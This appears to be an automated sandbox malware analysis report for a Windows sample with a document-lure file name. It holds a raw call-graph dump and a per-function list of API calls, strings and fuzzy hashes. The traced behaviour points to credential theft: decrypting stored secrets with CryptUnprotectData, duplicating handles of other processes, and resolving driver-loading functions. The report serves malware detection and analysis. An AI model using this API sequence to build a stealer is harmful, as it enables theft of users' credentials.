39123 40aa51 memcpy 39122->39123 39123->39118 39124->39032 39125->39032 39130 40a980 39126->39130 39127 40a8bb 39127->38892 39127->38893 39128 40a995 _wcsicmp 39128->39130 39129 40a99c wcscmp 39129->39130 39130->39127 39130->39128 39130->39129 39131->38896 39132->38900 39134 40aa23 RegEnumValueW 39133->39134 39134->38907 39134->38908 39136 405335 39135->39136 39137 40522a 39135->39137 39136->38487 39138 40b2cc 27 API calls 39137->39138 39139 405234 39138->39139 39140 40a804 8 API calls 39139->39140 39141 40523a 39140->39141 39180 40b273 39141->39180 39143 405248 _mbscpy _mbscat GetProcAddress 39144 40b273 27 API calls 39143->39144 39145 405279 39144->39145 39183 405211 GetProcAddress 39145->39183 39147 405282 39148 40b273 27 API calls 39147->39148 39149 40528f 39148->39149 39184 405211 GetProcAddress 39149->39184 39151 405298 39152 40b273 27 API calls 39151->39152 39153 4052a5 39152->39153 39185 405211 GetProcAddress 39153->39185 39155 4052ae 39156 40b273 27 API calls 39155->39156 39157 4052bb 39156->39157 39186 405211 GetProcAddress 39157->39186 39159 4052c4 39160 40b273 27 API calls 39159->39160 39161 4052d1 39160->39161 39187 405211 GetProcAddress 39161->39187 39163 4052da 39164 40b273 27 API calls 39163->39164 39165 4052e7 39164->39165 39188 405211 GetProcAddress 39165->39188 39167 4052f0 39168 40b273 27 API calls 39167->39168 39169 4052fd 39168->39169 39189 405211 GetProcAddress 39169->39189 39171 405306 39172 40b273 27 API calls 39171->39172 39173 405313 39172->39173 39190 405211 GetProcAddress 39173->39190 39175 40531c 39176 40b273 27 API calls 39175->39176 39177 405329 39176->39177 39191 405211 GetProcAddress 39177->39191 39181 40b58d 27 API calls 39180->39181 39182 40b18c 39181->39182 39182->39143 39183->39147 39184->39151 39185->39155 39186->39159 39187->39163 39188->39167 39189->39171 39190->39175 39193 405220 39 API calls 39192->39193 39194 405369 39193->39194 39194->38925 39194->38926 39195->38928 39196->38932 39197->38929 39198->38926 39200 40440c FreeLibrary 39199->39200 39201 40436d 39200->39201 39202 40a804 8 API calls 39201->39202 39203 404377 39202->39203 39204 404383 39203->39204 39205 404405 39203->39205 39206 40b273 27 API calls 39204->39206 39205->38497 39205->38498 39205->38499 39207 40438d GetProcAddress 39206->39207 39208 40b273 27 API calls 39207->39208 39209 4043a7 GetProcAddress 39208->39209 39210 40b273 27 API calls 39209->39210 39211 4043ba GetProcAddress 39210->39211 39212 40b273 27 API calls 39211->39212 39213 4043ce GetProcAddress 39212->39213 39214 40b273 27 API calls 39213->39214 39215 4043e2 GetProcAddress 39214->39215 39216 4043f1 39215->39216 39217 4043f7 39216->39217 39218 40440c FreeLibrary 39216->39218 39217->39205 39218->39205 39220 404413 FreeLibrary 39219->39220 39221 40441e 39219->39221 39220->39221 39221->38514 39222->38510 39224 40447e 39223->39224 39225 40442e 39223->39225 39226 404485 CryptUnprotectData 39224->39226 39227 40449c 39224->39227 39228 40b2cc 27 API calls 39225->39228 39226->39227 39227->38510 39229 404438 39228->39229 39230 40a804 8 API calls 39229->39230 39231 40443e 39230->39231 39232 404445 39231->39232 39233 404467 39231->39233 39234 40b273 27 API calls 39232->39234 39233->39224 39236 404475 FreeLibrary 39233->39236 39235 40444f GetProcAddress 39234->39235 39235->39233 39237 404460 39235->39237 39236->39224 39237->39233 39239 4135f6 39238->39239 39240 4135eb FreeLibrary 39238->39240 39239->38517 39240->39239 39242 4449c4 39241->39242 39243 444a52 39241->39243 39244 40b2cc 27 API calls 39242->39244 39243->38534 39243->38535 39245 4449cb 39244->39245 39246 40a804 8 API calls 39245->39246 39247 4449d1 39246->39247 39248 40b273 27 API calls 39247->39248 39249 4449dc GetProcAddress 39248->39249 39250 40b273 27 API calls 39249->39250 39251 4449f3 GetProcAddress 39250->39251 39252 40b273 27 API calls 39251->39252 39253 444a04 GetProcAddress 39252->39253 39254 40b273 27 API calls 39253->39254 39255 444a15 GetProcAddress 39254->39255 39256 40b273 27 API calls 39255->39256 39257 444a26 GetProcAddress 39256->39257 39258 40b273 27 API calls 39257->39258 39262->38545 39263->38545 39264->38545 39265->38545 39266->38536 39268 403a29 39267->39268 39282 403bed memset memset 39268->39282 39270 403ae7 39295 40b1ab free free 39270->39295 39272 403a3f memset 39276 403a2f 39272->39276 39273 403aef 39273->38553 39274 40a8d0 7 API calls 39274->39276 39275 409d1f 6 API calls 39275->39276 39276->39270 39276->39272 39276->39274 39276->39275 39277 409b98 GetFileAttributesW 39276->39277 39277->39276 39279 40a051 GetFileTime CloseHandle 39278->39279 39280 4039ca CompareFileTime 39278->39280 39279->39280 39280->38553 39281->38552 39283 414c2e 17 API calls 39282->39283 39284 403c38 39283->39284 39285 409719 2 API calls 39284->39285 39286 403c3f wcscat 39285->39286 39287 414c2e 17 API calls 39286->39287 39288 403c61 39287->39288 39289 409719 2 API calls 39288->39289 39290 403c68 wcscat 39289->39290 39296 403af5 39290->39296 39293 403af5 20 API calls 39294 403c95 39293->39294 39294->39276 39295->39273 39297 403b02 39296->39297 39298 40ae18 9 API calls 39297->39298 39306 403b37 39298->39306 39299 403bdb 39300 40aebe FindClose 39299->39300 39301 403be6 39300->39301 39301->39293 39302 40ae18 9 API calls 39302->39306 39303 40ae51 9 API calls 39303->39306 39304 40add4 wcscmp wcscmp 39304->39306 39305 40aebe FindClose 39305->39306 39306->39299 39306->39302 39306->39303 39306->39304 39306->39305 39307 40a8d0 7 API calls 39306->39307 39307->39306 39309 409d1f 6 API calls 39308->39309 39310 404190 39309->39310 39323 409b98 GetFileAttributesW 39310->39323 39312 40419c 39313 4041a7 6 API calls 39312->39313 39314 40435c 39312->39314 39315 40424f 39313->39315 39314->38579 39315->39314 39317 40425e memset 39315->39317 39319 409d1f 6 API calls 39315->39319 39320 40a8ab 9 API calls 39315->39320 39324 414842 39315->39324 39317->39315 39318 404296 wcscpy 39317->39318 39318->39315 39319->39315 39321 4042b6 memset memset _snwprintf wcscpy 39320->39321 39321->39315 39322->38577 39323->39312 39327 41443e 39324->39327 39326 414866 39326->39315 39328 41444b 39327->39328 39329 414451 39328->39329 39330 4144a3 GetPrivateProfileStringW 39328->39330 39331 414491 39329->39331 39332 414455 wcschr 39329->39332 39330->39326 39334 414495 WritePrivateProfileStringW 39331->39334 39332->39331 39333 414463 _snwprintf 39332->39333 39333->39334 39334->39326 39335->38583 39337 40b2cc 27 API calls 39336->39337 39338 409615 39337->39338 39339 409d1f 6 API calls 39338->39339 39340 409625 39339->39340 39365 409b98 GetFileAttributesW 39340->39365 39342 409634 39343 409648 39342->39343 39366 4091b8 memset 39342->39366 39345 40b2cc 27 API calls 39343->39345 39348 408801 39343->39348 39346 40965d 39345->39346 39347 409d1f 6 API calls 39346->39347 39349 40966d 39347->39349 39348->38586 39348->38613 39418 409b98 GetFileAttributesW 39349->39418 39351 40967c 39351->39348 39352 409681 39351->39352 39419 409529 72 API calls 39352->39419 39354 409690 39354->39348 39365->39342 39420 40a6e6 WideCharToMultiByte 39366->39420 39368 409202 39421 444432 39368->39421 39371 40b273 27 API calls 39372 409236 39371->39372 39467 438552 39372->39467 39375 409383 39377 40b273 27 API calls 39375->39377 39378 409399 39377->39378 39381 438552 134 API calls 39378->39381 39398 40951d 39398->39343 39418->39351 39419->39354 39420->39368 39517 4438b5 39421->39517 39423 44444c 39424 409215 39423->39424 39531 415a6d 39423->39531 39424->39371 39424->39398 39426 4442e6 11 API calls 39428 44469e 39426->39428 39427 444486 39429 4444b9 memcpy 39427->39429 39466 4444a4 39427->39466 39428->39424 39431 443d90 111 API calls 39428->39431 39535 415258 39429->39535 39431->39424 39432 444524 39433 444541 39432->39433 39434 44452a 39432->39434 39538 444316 39433->39538 39435 416935 16 API calls 39434->39435 39435->39466 39438 444316 18 API calls 39439 444563 39438->39439 39466->39426 39656 438460 39467->39656 39469 409240 39469->39375 39470 4251c4 39469->39470 39707 424f07 39470->39707 39518 4438d0 39517->39518 39528 4438c9 39517->39528 39605 415378 memcpy memcpy 39518->39605 39528->39423 39532 415a77 39531->39532 39533 415a8d 39532->39533 39534 415a7e memset 39532->39534 39533->39427 39534->39533 39536 4438b5 11 API calls 39535->39536 39537 41525d 39536->39537 39537->39432 39539 444328 39538->39539 39540 444423 39539->39540 39541 44434e 39539->39541 39606 4446ea 11 API calls 39540->39606 39542 432d4e 3 API calls 39541->39542 39544 44435a 39542->39544 39546 444375 39544->39546 39547 44438b 39544->39547 39549 416935 16 API calls 39546->39549 39550 444381 39549->39550 39550->39438 39606->39550 39668 41703f 39656->39668 39658 43847a 39659 43848a 39658->39659 39660 43847e 39658->39660 39675 438270 39659->39675 39705 4446ea 11 API calls 39660->39705 39667 438488 39667->39469 39669 417044 39668->39669 39670 41705c 39668->39670 39672 416760 11 API calls 39669->39672 39674 417055 39669->39674 39671 417075 39670->39671 39673 41707a 11 API calls 39670->39673 39671->39658 39672->39674 39673->39669 39674->39658 39676 415a91 memset 39675->39676 39677 43828d 39676->39677 39678 438297 39677->39678 39679 438341 39677->39679 39681 4382d6 39677->39681 39680 415c7d 16 API calls 39678->39680 39682 44358f 19 API calls 39679->39682 39683 438458 39680->39683 39684 4382fb 39681->39684 39685 4382db 39681->39685 39694 438318 39682->39694 39683->39667 39706 424f26 123 API calls 39683->39706 39687 415c23 memcpy 39684->39687 39686 416935 16 API calls 39685->39686 39688 4382e9 39686->39688 39689 438305 39687->39689 39689->39694 39691 438373 39693 43819e 115 API calls 39693->39691 39694->39691 39694->39693 39705->39667 39708 424f1f 39707->39708 39709 424f0c 39707->39709 39806 413f4f 39779->39806 39782 413f37 K32GetModuleFileNameExW 39783 413f4a 39782->39783 39783->38643 39785 413969 wcscpy 39784->39785 39786 41396c wcschr 39784->39786 39796 413a3a 39785->39796 39786->39785 39788 41398e 39786->39788 39811 4097f7 wcslen wcslen _memicmp 39788->39811 39790 41399a 39791 4139a4 memset 39790->39791 39792 4139e6 39790->39792 39812 409dd5 GetWindowsDirectoryW wcscpy 39791->39812 39794 413a31 wcscpy 39792->39794 39795 4139ec memset 39792->39795 39794->39796 39813 409dd5 GetWindowsDirectoryW wcscpy 39795->39813 39796->38643 39797 4139c9 wcscpy wcscat 39797->39796 39799 413a11 memcpy wcscat 39799->39796 39801 413cb0 GetModuleHandleW 39800->39801 39802 413cda 39800->39802 39801->39802 39805 413cbf GetProcAddress 39801->39805 39803 413ce3 GetProcessTimes 39802->39803 39804 413cf6 39802->39804 39803->38648 39804->38648 39805->39802 39807 413f2f 39806->39807 39808 413f54 39806->39808 39807->39782 39807->39783 39809 40a804 8 API calls 39808->39809 39810 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39809->39810 39810->39807 39811->39790 39812->39797 39813->39799 39814->38668 39815->38692 39817 409cf9 GetVersionExW 39816->39817 39818 409d0a 39816->39818 39817->39818 39818->38697 39818->38703 39819->38704 39820->38708 39821->38710 39822->38776 39824 40bba5 39823->39824 39868 40cc26 39824->39868 39827 40bd4b 39889 40cc0c 39827->39889 39832 40b2cc 27 API calls 39833 40bbef 39832->39833 39896 40ccf0 _wcsicmp 39833->39896 39835 40bbf5 39835->39827 39897 40ccb4 6 API calls 39835->39897 39837 40bc26 39838 40cf04 17 API calls 39837->39838 39839 40bc2e 39838->39839 39840 40bd43 39839->39840 39841 40b2cc 27 API calls 39839->39841 39842 40cc0c 4 API calls 39840->39842 39843 40bc40 39841->39843 39842->39827 39898 40ccf0 _wcsicmp 39843->39898 39845 40bc46 39845->39840 39846 40bc61 memset memset WideCharToMultiByte 39845->39846 39899 40103c strlen 39846->39899 39848 40bcc0 39849 40b273 27 API calls 39848->39849 39850 40bcd0 memcmp 39849->39850 39850->39840 39851 40bce2 39850->39851 39852 404423 38 API calls 39851->39852 39853 40bd10 39852->39853 39853->39840 39854 40bd3a LocalFree 39853->39854 39855 40bd1f memcpy 39853->39855 39854->39840 39855->39854 39856->38791 39857->38828 39858->38828 39859->38828 39860->38828 39861->38828 39862->38828 39863->38828 39864->38828 39865->38828 39866->38803 39867->38825 39900 4096c3 CreateFileW 39868->39900 39870 40cc34 39871 40cc3d GetFileSize 39870->39871 39879 40bbca 39870->39879 39872 40afcf 2 API calls 39871->39872 39873 40cc64 39872->39873 39901 40a2ef ReadFile 39873->39901 39875 40cc71 39902 40ab4a MultiByteToWideChar 39875->39902 39877 40cc95 CloseHandle 39878 40b04b ??3@YAXPAX 39877->39878 39878->39879 39879->39827 39880 40cf04 39879->39880 39881 40b633 free 39880->39881 39882 40cf14 39881->39882 39908 40b1ab free free 39882->39908 39884 40cf1b 39885 40cfef 39884->39885 39888 40bbdd 39884->39888 39909 40cd4b 39884->39909 39887 40cd4b 14 API calls 39885->39887 39887->39888 39888->39827 39888->39832 39890 40b633 free 39889->39890 39891 40cc15 39890->39891 39892 40aa04 free 39891->39892 39893 40cc1d 39892->39893 39950 40b1ab free free 39893->39950 39895 40b7d4 memset CreateFileW 39895->38783 39895->38784 39896->39835 39897->39837 39898->39845 39899->39848 39900->39870 39901->39875 39903 40ab93 39902->39903 39904 40ab6b 39902->39904 39903->39877 39905 40a9ce 4 API calls 39904->39905 39906 40ab74 39905->39906 39907 40ab7c MultiByteToWideChar 39906->39907 39907->39903 39908->39884 39910 40cd7b 39909->39910 39911 40aa29 6 API calls 39910->39911 39915 40cd89 39911->39915 39912 40cef5 39913 40aa04 free 39912->39913 39914 40cefd 39913->39914 39914->39884 39915->39912 39916 40aa29 6 API calls 39915->39916 39917 40ce1d 39916->39917 39918 40aa29 6 API calls 39917->39918 39919 40ce3e 39918->39919 39920 40ce6a 39919->39920 39943 40abb7 wcslen memmove 39919->39943 39921 40ce9f 39920->39921 39946 40abb7 wcslen memmove 39920->39946 39924 40a8d0 7 API calls 39921->39924 39927 40ceb5 39924->39927 39925 40ce56 39944 40aa71 wcslen 39925->39944 39926 40ce8b 39947 40aa71 wcslen 39926->39947 39931 40a8d0 7 API calls 39927->39931 39930 40ce5e 39945 40abb7 wcslen memmove 39930->39945 39934 40cecb 39931->39934 39932 40ce93 39948 40abb7 wcslen memmove 39932->39948 39949 40d00b malloc memcpy free free 39934->39949 39937 40cedd 39938 40aa04 free 39937->39938 39939 40cee5 39938->39939 39940 40aa04 free 39939->39940 39941 40ceed 39940->39941 39942 40aa04 free 39941->39942 39942->39912 39943->39925 39944->39930 39945->39920 39946->39926 39947->39932 39948->39921 39949->39937 39950->39895 39951->38843 39952->38851 40506 441819 40509 430737 40506->40509 40508 441825 40510 430756 40509->40510 40522 43076d 40509->40522 40511 430774 40510->40511 40512 43075f 40510->40512 40524 43034a memcpy 40511->40524 40523 4169a7 11 API calls 40512->40523 40515 4307ce 40517 430819 memset 40515->40517 40525 415b2c 11 API calls 40515->40525 40516 43077e 40516->40515 40520 4307fa 40516->40520 40516->40522 40517->40522 40519 4307e9 40519->40517 40519->40522 40526 4169a7 11 API calls 40520->40526 40522->40508 40523->40522 40524->40516 40525->40519 40526->40522 40527 41493c EnumResourceNamesW

                                                                                                              Executed Functions

                                                                                                              Function 0040DD85 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 212filenativeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040DDAD
                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                              • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                              • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                              • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                              • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                              • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                              • memset.MSVCRT ref: 0040DF5F
                                                                                                              • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                              • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                              • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                              • String ID: dllhost.exe$p+vw@Fvw@Bvw$taskhost.exe$taskhostex.exe
                                                                                                              • API String ID: 708747863-11196306
                                                                                                              • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                              • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                              Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 644 413eb7-413ebd 641->644 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 644->645 646 413ebf-413ec6 free 644->646 648 413edb-413ee2 645->648 646->648 655 413ee4 648->655 656 413ee7-413efe 648->656 662 413ea2-413eae CloseHandle 650->662 653 413e61-413e68 651->653 654 413e37-413e44 GetModuleHandleW 651->654 653->650 659 413e6a-413e76 653->659 654->653 658 413e46-413e5c GetProcAddress 654->658 655->656 656->638 658->653 659->650 662->641
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                              • memset.MSVCRT ref: 00413D7F
                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                              • memset.MSVCRT ref: 00413E07
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                              • free.MSVCRT ref: 00413EC1
                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                              • API String ID: 1344430650-1740548384
                                                                                                              • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                              • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                              Function 0040B58D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 754 40b58d-40b59e 755 40b5a4-40b5c0 GetModuleHandleW FindResourceW 754->755 756 40b62e-40b632 754->756 757 40b5c2-40b5ce LoadResource 755->757 758 40b5e7 755->758 757->758 759 40b5d0-40b5e5 SizeofResource LockResource 757->759 760 40b5e9-40b5eb 758->760 759->760 760->756 761 40b5ed-40b5ef 760->761 761->756 762 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 761->762 762->756
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                              • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                              • String ID: AE$BIN
                                                                                                              • API String ID: 1668488027-3931574542
                                                                                                              • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                              • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                              Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 767404330-0
                                                                                                              • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                              • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
